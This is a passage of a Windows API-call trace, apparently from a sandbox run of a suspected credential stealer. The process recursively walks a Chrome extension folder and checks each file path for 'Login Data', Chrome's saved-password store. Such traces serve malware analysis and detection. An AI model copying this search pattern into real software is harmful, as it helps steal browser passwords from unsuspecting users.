[0161.644] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.644] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0161.644] lstrcmpiW (lpString1="zh_TW", lpString2=".") returned 1 [0161.644] lstrcmpiW (lpString1="zh_TW", lpString2="..") returned 1 [0161.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.644] lstrlenW (lpString="\\") returned 1 [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.644] lstrlenW (lpString="zh_TW") returned 5 [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" [0161.644] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 140 [0161.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 140 [0161.644] lstrlenW (lpString="\\*.*") returned 4 [0161.644] GetProcessHeap () returned 0x8e0000 [0161.644] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" [0161.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*.*" [0161.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.645] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.645] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.645] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.645] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.645] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 140 [0161.645] lstrlenW (lpString="\\") returned 1 [0161.645] GetProcessHeap () returned 0x8e0000 [0161.645] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW" [0161.646] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\" [0161.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\") returned 141 [0161.646] lstrlenW (lpString="messages.json") returned 13 [0161.646] GetProcessHeap () returned 0x8e0000 [0161.646] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.646] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\" [0161.646] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" [0161.646] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.646] GetProcessHeap () returned 0x8e0000 [0161.646] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.646] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0161.646] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.646] GetProcessHeap () returned 0x8e0000 [0161.646] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.646] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.646] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.648] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.648] GetProcessHeap () returned 0x8e0000 [0161.648] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.648] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.648] GetProcessHeap () returned 0x8e0000 [0161.648] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.648] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0161.648] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.648] VirtualQuery (in: lpAddress=0x925ba0, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.648] GetProcessHeap () returned 0x8e0000 [0161.648] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ba0 | out: hHeap=0x8e0000) returned 1 [0161.648] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.648] GetProcessHeap () returned 0x8e0000 [0161.648] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.648] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0161.648] lstrcmpiW (lpString1="_metadata", lpString2=".") returned 1 [0161.648] lstrcmpiW (lpString1="_metadata", lpString2="..") returned 1 [0161.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.648] lstrlenW (lpString="\\") returned 1 [0161.648] GetProcessHeap () returned 0x8e0000 [0161.648] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.648] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.648] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.649] lstrlenW (lpString="_metadata") returned 9 [0161.649] GetProcessHeap () returned 0x8e0000 [0161.649] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925a88 [0161.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.649] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0161.649] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.649] GetProcessHeap () returned 0x8e0000 [0161.649] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0161.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0161.649] lstrlenW (lpString="\\*.*") returned 4 [0161.649] GetProcessHeap () returned 0x8e0000 [0161.649] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x925ba0 [0161.649] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0161.649] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*.*" [0161.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*.*", lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0161.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.650] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.650] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85d166b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="computed_hashes.json", cAlternateFileName="COMPUT~1.JSO")) returned 1 [0161.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0161.650] lstrlenW (lpString="\\") returned 1 [0161.650] GetProcessHeap () returned 0x8e0000 [0161.650] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x112) returned 0x925cc0 [0161.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata" [0161.650] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\" [0161.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 